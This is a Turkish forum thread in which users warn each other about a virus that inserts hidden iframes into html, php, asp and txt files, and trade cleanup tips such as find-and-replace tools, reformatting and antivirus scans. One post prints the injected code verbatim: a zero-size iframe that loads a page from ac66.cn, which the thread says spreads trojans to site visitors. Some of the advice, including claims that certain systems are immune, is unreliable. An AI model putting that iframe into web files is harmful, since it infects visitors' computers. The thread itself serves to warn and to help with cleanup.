yeni virüs-Dikkat!-

Question

arkadaşlar cuma günü bilgisayarıma bi virüs bulaştı.  buraya kadar herşey normal.  ama virüs şimdiye kadar görmediğim, duymadığım derecede büyük bir zarar verdi ve bu zararı bir tesadüf sonucu öğrendim.
   olay şu:virüs bilgisayarında ne kadar asp,php.html,txt vs.., yani kısaca içinde yazı bulunan herşeyin içine bir iframe atıyor, sende farketmezsen sunucuna atıyorsun ve frameden virüs kullanıcılarınada yayılıyor. 
   biraz araştırdım virüsü internette, hiçbir antivir yakalıyamıyor, temizleyemiyor... tek seçenek, dosyalarından iframeleri temizlemek ve format...
bende öyle yaparak kurtuldum ancak. tabi bunu tek tek temizlemek zor, bilgisayarımda tam 17.341 adet dosyada iframeni buldum virüsün.frameleri temizlemek için Advanced Find And Replace programını kullandım.
   Hızla yayılıyormuş virüs, rusmuş yapanlar sanırım, virüslü linki vermek istemiyorum tıklayanlar olur diye ama ac66.cn diye başlayan bi adresten geliyor(kesinlikle girmeyin!!!!) Lütfen Dikkat.....

troy · Answer

bu sabah r10'a girdiğim an bu virus uyarısını aldım?

spy_force · Answer

dreamweaver ile tüm bilgisayardaki html php vb... uzantılı dosyalardaki belli bir kodu düzenleyebilirsiniz bununla temizleyin bence

MonteCristo · Answer

Allah' şükür bende yok bu virüs  Bir bulaşsa duman oldum valla..

Bartuc · Answer

bi arkadaş virüsün attığı iframe kodunu verdi sazanlama iframedeki siteye daldım. zonealarm direk "spy site" dire blokladı siteyi, erişimi engelledi.

zonealarm öneririm

MonteCristo · Answer

Bartuc adlı üyeden alıntı:						mesajı görüntüle									bi arkadaş virüsün attığı iframe kodunu verdi sazanlama iframedeki siteye daldım. zonealarm direk "spy site" dire blokladı siteyi, erişimi engelledi.
zonealarm öneririm  		Ben de girecektim de sonra kendi kendime dedim "kaşınıyor musun"

Bartuc · Answer

banada virüs diyerek vermedi kodu. kodu yazdı sonradan virüs dedi. ben de bişi soracak diye atladım sazanlama

spy_force · Answer

spy_force adlı üyeden alıntı:						mesajı görüntüle									dreamweaver ile tüm bilgisayardaki html php vb... uzantılı dosyalardaki belli bir kodu düzenleyebilirsiniz bununla temizleyin bence 		bilgisayarına bulaşanlar bir html açsın ctrl+f desin orda sol üsteki seçenek yerinden folderi seçsin yan tarafa c:\ d:\ gibi sürücüleri yazssın alttaki kutucuğa ilkine <iframe.... yi ikinciye boşluk yapın replace all deyin bütün pcden temizliyo

ReaL · Answer

Virüsün bulaşma yöntemi çok komik; karşı tarafa bulaşmışsa ondan sadece bir  .txt veya .asp dosyası alıyorsunuz size 6 7 tane exe ile birlikte eşantiyon olarak bilgisayarınızdaki yazı dosyaları kadar iframe geliyor. Temizlemek için hiç yırtınmayın o kadar önemli dosyanız yoksa basın formatı kurtulun.

spy_force · Answer

ReaL adlı üyeden alıntı:						mesajı görüntüle									Virüsün bulaşma yöntemi çok komik; karşı tarafa bulaşmışsa ondan sadece bir  .txt veya .asp dosyası alıyorsunuz size 6 7 tane exe ile birlikte eşantiyon olarak bilgisayarınızdaki yazı dosyaları kadar iframe geliyor. Temizlemek için hiç yırtınmayın o kadar önemli dosyanız yoksa basın formatı kurtulun. 		ben meraktan diğer pc de yedim virüsü temizlemem 3 saati aldı formattan daha kısa yani bir önceki msjımda temizleme yöntemini anlatıyorum ordan bakın bende 8m kadar dosyaya girmiş ibna

Scorpion1 · Answer

Aynısı banada bulaştı bilgisayar bir an acayip kasılıyor kendine gelmiyordu html dosyalar bazen açılmıyor kodlara baktıgımda aşagıda degişik kodlar vardı iframe format attım şuan sorun yok

benikaydet · Answer

ac66 virüsü silen program: http://www.forumuz.biz/showpost.php?...15&postcount=3

forum:ac66 virüsü - Forumuz.biz

inceleyin lütfen......

gördüğüm kadar herkes norton tavsiye ediyor..bir kere bulaşmışsa yandınız..tek tek temizlemekten yada formatlamaktan başka çare şu an için yok gibi...

ayrıca zip ve rar dosyalarına bulaşmıyormuş..

işleri olan arkadaşlar , dosyalarını zip veya rar olarak güvenceye alsınlar..

supermp3.org sitesindende bulaşıyormuş..

bu arada firefox kullanın...

emucu · Answer

şimdi arkadaşlar biri bana akıl versin makineyi geçenlerde yedeklemiştim C sürücüsüne xp yi D ye kurmuştum.

D ye bu virüs girdi fakat c deki yedeklere bakıyorum aynı adres ordaki dosyalarımdada var.

format atsam yedeklerde aynı şey olduğundan ne gibi bir yol izlemem lazım ?

bana biri anlatırsa sevinirim deliricem :S

Mesut Dadas · Answer

Linux değilde ben macintosh alıcam.
Şuan mac Türkiyede pek yaygın değil ama Türkiyede bir çok saglam şirketler Mac kulalnıyor.Mac in asıl işlevi grafik-tasarım ama adamlar süper bir güvenlik yapmışlar 
Hack,Virüs vsvs gibi olaylar sıfır 
Ama biraz tuzlu gelebilir 
Ben G5 Almayı düşünüyorum.Herkesede tavsiye ediyorum

Scorpion1 · Answer

deli olacam ya kurtuluş yok o kadar dosya ver hepsini silecem php html arşiv gidecek :@

emucu · Answer

linkteki programı kurdum taratıyorum makine restart yapıyor ve geri açmıyor.

unoxxx · Answer

unoxxx adlı üyeden alıntı:						mesajı görüntüle									arkadaşlar cuma günü bilgisayarıma bi virüs bulaştı. buraya kadar herşey normal. ama virüs şimdiye kadar görmediğim, duymadığım derecede büyük bir zarar verdi ve bu zararı bir tesadüf sonucu öğrendim.
olay şu:virüs bilgisayarında ne kadar asp,php.html,txt vs.., yani kısaca içinde yazı bulunan herşeyin içine bir iframe atıyor, sende farketmezsen sunucuna atıyorsun ve frameden virüs kullanıcılarınada yayılıyor. 
biraz araştırdım virüsü internette, hiçbir antivir yakalıyamıyor, temizleyemiyor... tek seçenek, dosyalarından iframeleri temizlemek ve format...
bende öyle yaparak kurtuldum ancak. tabi bunu tek tek temizlemek zor, bilgisayarımda tam 17.341 adet dosyada iframeni buldum virüsün.frameleri temizlemek için Advanced Find And Replace programını kullandım.
Hızla yayılıyormuş virüs, rusmuş yapanlar sanırım, virüslü linki vermek istemiyorum tıklayanlar olur diye ama ac66.cn diye başlayan bi adresten geliyor(kesinlikle girmeyin!!!!) Lütfen Dikkat..... 		arkadaşlar nasıl kurtulduğumu anlatıyorum ama okumuyosunuz galiba, hikaye olarak yazmadım bu yazıyı, virüs bulaşanlar dikkatle okusun lütfen...

unoxxx · Answer

yazarak olmuyor sanırım, en iyisi resimlerle anlatmak olacak.bu işlemleri yapmadan önce hiçbir şekilde virüsle uğraşmayın ve hiçbir program çalıştırmayın, hatta internet bağlantınızı kesin.
bu program sayesinde virüsün tüm html,asp,php,txt vs. dosyalarınıza attığı iframe kodundan kurtulmuş olacaksınız.

1-programı açtıktan sonra REPLACE'i seçiyoruz

2-frame kodu olan dosyalar nerde ise o bölgeyi seçiyoruz(virüs heryere bulaştırdığı için direk c sürücüsünü veya d sürücüsünü seçebilirsiniz, ama işlem uzun sürer, önemli dosyalarınız nerdeyse o klasörden başlayın)
3-virüsün bulaştırdığı frame kodunu yazıyoruz.
4-bu alan boş kalıcak hiçbişey olmasın.
5-herşey hazırsa EXECUTE'ye basıyoruz.(bize değiştirimmi diye sorucak yes to all'ı seçersiniz)
6-değiştirdiği dosyaları buraya yazacak
 
artık tek yapmanız gereken dosyalarınızı cd ya da dvd ye kaydetmek kaydetmeden önce framelerde kurtulduğunuza emin olun. bundan sonra virüsü nasıl temizleyeceğiniz size kalmış, ben direk format attım.
kolay gelsin...

oyun · Answer

unoxxx adlı üyeden alıntı:						mesajı görüntüle									yazarak olmuyor sanırım, en iyisi resimlerle anlatmak olacak.bu işlemleri yapmadan önce hiçbir şekilde virüsle uğraşmayın ve hiçbir program çalıştırmayın, hatta internet bağlantınızı kesin.
bu program sayesinde virüsün tüm html,asp,php,txt vs. dosyalarınıza attığı iframe kodundan kurtulmuş olacaksınız.

1-programı açtıktan sonra REPLACE'i seçiyoruz

2-frame kodu olan dosyalar nerde ise o bölgeyi seçiyoruz(virüs heryere bulaştırdığı için direk c sürücüsünü veya d sürücüsünü seçebilirsiniz, ama işlem uzun sürer, önemli dosyalarınız nerdeyse o klasörden başlayın)
3-virüsün bulaştırdığı frame kodunu yazıyoruz.
4-bu alan boş kalıcak hiçbişey olmasın.
5-herşey hazırsa EXECUTE'ye basıyoruz.(bize değiştirimmi diye sorucak yes to all'ı seçersiniz)
6-değiştirdiği dosyaları buraya yazacak
 
artık tek yapmanız gereken dosyalarınızı cd ya da dvd ye kaydetmek kaydetmeden önce framelerde kurtulduğunuza emin olun.
kolay gelsin... 		Teşekkürler ..

emucu · Answer

virüsü sanırım temizledim ama dosyaları tek tek düzenleyeceğim.


ayrıntılı bilgi için
F-Secure Trojan Information Pages: Delf.AUY


programı indirmek için

http://esd.element5.com/demoreg.html...k=16cb0df5&l=1


şimdi tek problem bu programımı kullanayım başka virüs progumu kurayım ?

emucu · Answer

unoxxx adlı üyeden alıntı:						mesajı görüntüle									4-bu alan boş kalıcak hiçbişey olmasın. 		
öncelikle teşekkürler değiştirmeye başladım.

yalnız değişicek arkadaşlar ordaki yazıyı silsin yoksa kodun yerine orda ne yazıyorsa onu koyuyor yani orda hiçbirşey olmasın silin.

BnYmN · Answer

kaspersky anti-virus (6.0.2.621) ile hiçbir sorun yaşamadım, bir çok siteyi frame yüzünden dropladı.

erateam · Answer

iframe kodlarını temizlemek istediğimde kodların random üretildiğini farkettim. Herhangi bir iframe kodunu yapıştırdığım zaman sadece bir tane buluyordu yalnız id numaraları random üretilmiş onlarca kod vardı. Hepsini birden temizlemek için kullandığım yöntem : Program : Search and Replace Search for bölümüne : \

vidoo · Answer

Şuana kadar hit bir iframe felan bulaşmadı bana . inş. bulaşmaz

serdartaylan · Answer

1 ay öncesinde banada dek geldi bu localhost dizinine command.com diye virus atıyor ve ben bunu d sürücünün içindeki AUTORUN.ini ile farkettim normalde gizli olarka kullanıyorum ve ico için ama bi baktım dğeiştirmiş sonra

kaspersky gibi güncel bir virus programı bulamıyor yani bir şey yapamıyor...

değiştirmek için tek tek uğraşmışltım ama arkadaşın dediği programı deneyim bakalım

şuan gelemiyor nedendir bilmiyorum ama bazı html asp dosyalarımda var halen..

çok pis bir virus ama helal olsun valla çocuklara acaba hangi garajdalar

hackxien · Answer

teşekkürler bilgi için,dikkatli olmak lazım..

prosman · Answer

evet bendede var aynı sorun ne yapcaz

artı saniyelik kitlenme yapıyor rundll32 yi kullanıyor

dreamweavrda sürekli kontrol ediyorum ifrema yko ama siteye bakıyorum frame var anlayamadım ya :S

unoxxx · Answer

prosman adlı üyeden alıntı:						mesajı görüntüle									evet bendede var aynı sorun ne yapcaz

artı saniyelik kitlenme yapıyor rundll32 yi kullanıyor

dreamweavrda sürekli kontrol ediyorum ifrema yko ama siteye bakıyorum frame var anlayamadım ya :S 		explorerda var gibi görünebiliyo, başka bir bilgisayarda sunucundaki dosyalara bak, varsa localdekileri temizle ve yedekle. sonrada format at, başka çaresi yok... çok pis bişi...
not:2 tane daha run.dll ekliyo o çalışanlar onlar.....

prosman · Answer

unoxxx adlı üyeden alıntı:						mesajı görüntüle									explorerda var gibi görünebiliyo, başka bir bilgisayarda sunucundaki dosyalara bak, varsa localdekileri temizle ve yedekle. sonrada format at, başka çaresi yok... çok pis bişi... 		bulaştığı yerler flash,fireworks,dreamweaver,opera,firefox

yani aklınıza gelen tüm hekp html ler makinadaki asp,php,htm,html hepsine bulaşıyo


helal olsun iyi yapmıslar

Ufuk Gedik · Answer

gömün fdisk i

baris333 · Answer

nasıl bulaşıyo ya korkuttunuz şimdi zone alrm gibi bi program kullanıyomuydun bide iframe de ne çıkıyo

Bartuc · Answer

zonealarm + nod32'yi aşabilirmi bu alet?

unoxxx · Answer

frameden bişi açmıyo, sen sayfadayken yaklaşık 30 saniye içinde virüsü sokuyo bilgisyarına, ayrıca yakalayan antivire rastlamadım, yakalayamazsa zaten silemez,anında heryere kopyalıyo kendini, sülük gibi yapışıyo, yazım izni olmayan dosyalar dahil.......

prosman · Answer

ya bunun çözümü yokmu find replace felan hikaye makina mouse sürekli takılıyo bişi yapamıyom acvcil işlerim var yazı yazamıyorum tak tak  fix mix yokmu ya

absoul · Answer

aynı sorun biz de de var hatta bizim abi bu iframe için kısa bi kod yazdı dosyaların içindeki bu acn66 iframe'ini bulup silior biz önlemini aldık hızla yayılıyor dikkatli olalım !

Venom · Answer

Bilmediginiz sitelere girmemeye bakin derim, Ben MSN'den link geldimi guvenmedigim biriyse girmem o linke.

metalfun · Answer

benim phpnuke siteme girmişti siteye atmışlardı ne yaptımsa kurtaramadım en son makinayı değiştirdim komple sıfırdan siteyi kurmuştum :s

DeviLLe · Answer

aynı olay benim başıma geldi. hatta sormuştum sitede virus olduğunu nasıl anlarız diye. sonradan çaktım olayı. her gördüğü php dosyasının altına 0 a 0 olarak iframe açıyor sitenize her girene truva atı bulaştırıyor. bana tam 8 tane bulaşmıştı.
bulaştığı yer c:\windows\update ve c:\windows\system32 içerisine bakın eğer 1.exe 2.exe ...... 8.exe ye kadar vardı buluyorsun görüyorsun siliyorsun bunları ama pc yi restart edince tekrardan ürüyorlardı. 4 tane antivir. kurdum hiç biri bir işe yaramadı bunları temizlerken format attım gene olmadı.

en son çareyi avast i sevmediğim halde denize düşen yılana sarılır hesabı kurdum ve tarattırdım. buldu fakat bulduğu virusleri silemedi.

nasıl kurtuldum?
güvenli kipte açtım önce orada karantina altına aldırdım.
normal kipe geçtim baktım ki bi faydası olmamış tekrar bunlar otomatik olarak çalışıyorlar.
yerlerini tespit ettiğim için gittim o klasöre önce CTRL+ALT+DEL yapıp işlemlerde gözüken 1.exe 2.exe ... gibi programları kapattım. ama burda hızlı olmalısınız hemen açılıyor tekrar.
kapattıktan sonra bu klasörde sırasıyla 1.exe nin üzerine sağ tıklayıp tara dedim ve virus olduğunu söyledi bana hemen tümünü sil dedim.
daha sonra diğerlerine de sırasıyla yaptım. ve şu son 3 gündür hiç bir şekilde açılmıyorlar. allah kimseye bulaştırmasın derim.

çok uzun yazdım kusura bakmayın. bulaşmış olan arkadaş varsa bu şekilde kurtulabilir.

truvanın isimlerini merak ederseniz onlarda şöyle :

C:\WINDOWS\system32\update\1.exe\[PESpin]
Win32:Pepatch-Q [Trj]

C:\WINDOWS\system32\update\4.exe\[UPX]
Win32:Qqrob-BN [Trj]

C:\WINDOWS\system32\update\7.exe
Win32:Small-AMI [Trj]

C:\WINDOWS\system32\8.exe
Win32:Small-AMI [Trj]

UYARI : Aşağıdaki Link e sakın tıklamayın.
pc de bulunan zip dosyaları haricindeki tüm php uzantılı dosyalarımın altına eklediği kod aşağıdadır.

<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>

Blade__ · Answer

peki bulaşmamasını engellemek için çıkan bir eklanti falan yokmu antivirüsler yakalayamıyor diyorsunuz çünkü...

serdartaylan · Answer

kendi makinamaçısından çok tedbirliği c sürümde hiç bir işlem yapmıyorum desktop olarak D:\DESKTOP ayarladım bilgisayarımın C sürücüsü ile işim olamdıgı için tabi birde deepfreeze kullandığım için virus bulaşmıyor bulaşsada aç kapa gidior dersem ayıp etmemiş olurum sanırım

ama localdeki bütün asp php htm ne varsa hepsine ekledi şimdide onu arkadaşın bahsettiği programla Advanced Find and Replace temizledim artık temizim  2074 dosyama dalmış veled....

bu arada desktop nasıl D:\DESKTOP olur konusunu bir konuya açalım dimi. 
buyrun buraya tıklayarak inceleyebilirsiniz

PoSeiDoN · Answer

Şerefsiz antivirüs bana da bulaştı avast ötüp duruyo, virüsü yapanın sülalesinde namuslu dişi kalmadı, bende diyorum bu kod ne her php ve html kodunun en altında bu oluyo, eskiden böyle bişey yoktu diyodum bende, nasıl silicem bu lanet şeyi, avast salak salak ötüyo ama silemiyo çünkü bulunan virüs sistem dosyalarına bulaşmış, bende yüzlerce dosya var php ve html nasıl temizlicem hele bi de webmaster ım dosyaları sunucuya upload etmiştim, orası var şimdi off offfff ne işe yarıyo bu antivirüsçüler ve microsoft anlamıyom..

dgenc · Answer

bu gerizekalı şey banada bulaşmış 2 sayfamda rastladım acilen sildim pcyi temizledim çoğu diğer sayfaları rastgele kontrol ettim hiç rastlamadım ama genel tarama yapmak istiyorum binlerce sayfa var.. bunları bulan ve silen bir program varmı?

Efsane · Answer

arkadaşlar herhangi siteden bılaşablir özelikle bazı yabancı upload sitelerinden açılan opuplara dikkat edn dün banada bılaştı çünkü bılaştığını nasıl anlarsınız saatin orda kırmızı bi x işareti görürsünüz lk başta sonra hatalar verir sonra bişey yüklemeye başlar eğer yüklerse çok zor temizlemesi hatta mkansız yeniden windows kurma olasılığı olabilir.Dikkatli olalım.

1PixeL · Answer

Bu olaydan bir ders çıkaralım;
Hep beraber LINUX kullanalım .. (Ben kullanmıyorum, ama kullanmam yakındır)

Bulaşanlara geçmiş olsun.. Benim PC'de Windows Güvenlik Duvarından başka bişi yok  Bana bulaşırsa..

TurkoLoco · Answer

evet bende freebsd cdsi var, nezmndn beri kuracaktim, ama ugrasmadim nedense

alpsi · Answer

Linux için uygun adım ileri 

Kullandığınız tarayıcıyı sistemden kaldırın.Firefox yada maxthon gibi başka bir tarayıcı Yükleyin.

Avastı kurduktan sonra size bi soru soracaktır.Bilgisayar yeniden açıldığında tarama yapayımmı gibisinden.
Evet diyin ve bilgisayarınızı yeniden başlatın.
Otomatik taramaya başlayacaktır.Virüsü yakalayıpta silmeme olasılığı 0(sıfır)